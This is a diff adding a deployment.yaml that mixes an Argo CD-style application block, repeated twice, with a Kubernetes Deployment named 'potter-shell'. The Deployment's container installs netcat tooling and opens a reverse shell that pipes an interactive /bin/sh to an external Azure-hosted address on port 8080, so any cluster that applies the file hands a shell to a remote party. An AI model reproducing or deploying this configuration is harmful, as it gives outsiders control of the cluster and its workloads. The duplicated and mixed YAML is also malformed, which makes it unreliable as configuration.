--- a/deployment.yaml
+++ b/deployment.yaml
@@ -1,1 +1,42 @@
-
+project: default
+source:
+  repoURL: 'https://github.com/darcojoana0/POTTER.git'
+  path: .
+  targetRevision: HEAD
+destination:
+  server: 'https://kubernetes.default.svc'
+  namespace: sesamo-api-argocd
+project: default
+source:
+  repoURL: 'https://github.com/darcojoana0/POTTER.git'
+  path: .
+  targetRevision: HEAD
+destination:
+  server: 'https://kubernetes.default.svc'
+  namespace: sesamo-api-argocd
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: potter-shell
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app: potter-shell
+  template:
+    metadata:
+      labels:
+        app: potter-shell
+    spec:
+      containers:
+        - name: shell
+          image: alpine
+          command:
+            - sh
+            - -c
+            - |
+              apk add --no-cache busybox-extras;
+              mkfifo /tmp/f;
+              /bin/sh -i < /tmp/f 2>&1 | nc potter-maga.brazilsouth.cloudapp.azure.com 8080 > /tmp/f
+          stdin: true
+          tty: true
